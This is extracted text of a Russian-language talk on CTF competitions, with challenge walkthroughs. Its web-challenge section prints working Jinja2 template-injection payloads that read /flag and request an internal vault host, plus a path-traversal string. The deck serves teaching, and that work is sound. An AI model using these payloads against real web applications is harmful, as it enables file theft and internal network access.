Presentation tells about CTF laboratory and its competitions as well as how useful for a developer is to know more about cyber security in their every day life В презентации идет речь о лаборатории CTF и различных заданиях. А также о том, как прохождение заданий CTF поможет разработчику узнать больше в кибер безопасности с применением в повседневной жизни. Автор: Александр Вишняков / Alexander Vishnyakov

1. Играем в CTF
- познаем мир
информационной безопасности

2. Кто я такой?
• Участник CTF команды b1n4ry4rms
и один из основателей команды hackerstan (об этой команде
ниже)
• Играю в CTF c августа 2016 года
• Работаю в Mad Devs, занимаюсь вебом.
• Больше 10 лет опыта в программировании
• Интересуюсь ИБ

3. В каких CTF поучаствовал?

4. Лаборатории, в которых участвовал:
V8 , V9, V10
lab.pentestit.r
u

5. Что такое CTF?
• Скорость
• Навыки и знания
• Командная работа

8. Ну и главная цель CTF :)

9. Результаты личного CTF hackyou.ctf.su
• 1400 очков 62 место из 374 участников и я
единственный из Кыргызстана :) участвовал

10. Достижения hackerstan 540 pts 406 место

11. hackerstan
А ты готов вступить в
ряды нашей команды?
https://goo.gl/SvZvqG

13. Виды CTF
• Jeopardy
• Командные
• Личные
• Attack-defence
• Командные

14. Погрузимся в мир CTF

15. Zumbo 3 (WEB)
Bsidessf CTF

19. <!-- page: index.template,
src: /code/server.py -->

21. flag1 = 'FLAG: FIRST_FLAG_WASNT_HARD'

22. with open('/flag') as f:
flag2 = f.read()

23. flag3 =
requests.get('http://vault:8080/flag').text

25. /..%2f../flag

26. template += "n<!-- page: %s, src: %s -->n" % (page, __file__)
return flask.render_template_string( template, name='test',
counter=counter);

27. SSTI - Server Side Template Injection ?
Как проверить?

29. {{''.__class__.__mro__[2].__subclasses__()}}

30. {{''.__class__.__mro__[2].__subclasses__().
__str__().split(‘, ’)[40]}}

31. {{''.__class__.__mro__[2].__subclasses__()[40]('/flag').read()}}

32. {{''.__class__.__mro__[2].__subclasses__().
__str__().split(‘, ’)[341]}}

33. {% with b=''.__class__.__mro__[2].
__subclasses__()[341]('vault:8080') %}
{{b.request('GET', '/flag')}}
{{b.getresponse().read()}}{% endwith %}

34. hackyou.ctf.su

36. root@kali:~/# echo -e
"ZDc3MTEyMDJmYmFiOGE2ZTc1YjY5ZmZmOGZiOWQ3OTM=" | base64
-d; echo ''
d7711202fbab8a6e75b69fff8fb9d793
root@kali:~/#

37. root@windows:~/ScrapyProjects# scrapy startproject hackyouctf
New Scrapy project 'hackyouctf', using template directory
'/usr/local/lib/python2.7/dist-packages/scrapy/templates/project', created in:
/root/ScrapyProjects/hackyouctf
You can start your first spider with:
cd hackyouctf
scrapy genspider example example.com

38. root@windows:~/ScrapyProjects/hackyouctf#
scrapy genspider ppc100 hackyou-captcha.ctf.su
Created spider 'ppc100' using template 'basic' in module:
Hackyouctf.spiders.ppc100
root@windows:~/ScrapyProjects/hackyouctf#
cd hackyouctf/spiders/
root@windows:~/ScrapyProjects/hackyouctf/hackyouctf/spiders#
ls
__init__.py __init__.pyc ppc100.py
root@windows:~/ScrapyProjects/hackyouctf/hackyouctf/spiders#

39. <code> ……... </code>

40. Scrapy Spider

41. root@windows:~/ScrapyProjects/hackyouctf#
scrapy crawl ppc100
Flag: <b>Kill_4ll_hum4ns_like_in_f1rst_hack_y0u_h2LExNo</b>

43. strings steg200_a086e0c.jpeg
JFIF
http://futureboy.us/
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
#3R
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
^Gko
NS?7W
@=Fx
5<in
wATu$db
3OM

44. Присутствует раздел стенографии

45. Выбор декодирования картинки

46. Загружаем картинку

47. http://futureboy.us/stegano/decode.pl

48. Вс3м сп4с160!